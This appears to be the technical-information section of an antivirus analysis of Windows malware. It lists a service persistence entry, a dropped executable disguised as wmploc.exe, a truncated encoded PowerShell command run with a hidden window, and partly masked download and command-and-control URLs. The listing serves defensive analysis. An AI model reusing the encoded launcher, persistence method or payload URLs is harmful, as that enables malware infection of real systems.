Technical information
- [<HKLM>\System\CurrentControlSet\Services\wmploc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\wmploc] 'ImagePath' = '"%WINDIR%\SysWOW64\Dism\wmploc.exe"'
- 'wmploc' "%WINDIR%\SysWOW64\Dism\wmploc.exe"
- 'wmploc' %WINDIR%\SysWOW64\Dism\wmploc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEYAVgBYAEkAawBsAHcAPQAnAFQATgBaAFUAWABmAG4AbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAFUAUgBJAHQAeQBQAHIAbwBgAFQATwBDAE8AbAAiACAAPQAgAC...
- %HOMEPATH%\768.exe
- %WINDIR%\syswow64\dism\wmploc.exe
- %HOMEPATH%\768.exe to %WINDIR%\syswow64\dism\wmploc.exe
- '17#.#02.48.180':80
- http://co####expuebla.org/documentos/k_n_iv8ku/
- http://17#.#02.48.180/vBMpL/EEvf2gZkPgKjGe/
- DNS ASK da#####hiphopcity.com
- DNS ASK co####expuebla.org
- '%HOMEPATH%\768.exe'
- '%WINDIR%\syswow64\dism\wmploc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEYAVgBYAEkAawBsAHcAPQAnAFQATgBaAFUAWABmAG4AbQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAFUAUgBJAHQAeQBQAHIAbwBgAFQATwBDAE8AbAAiACAAPQAgAC...' (with a hidden window)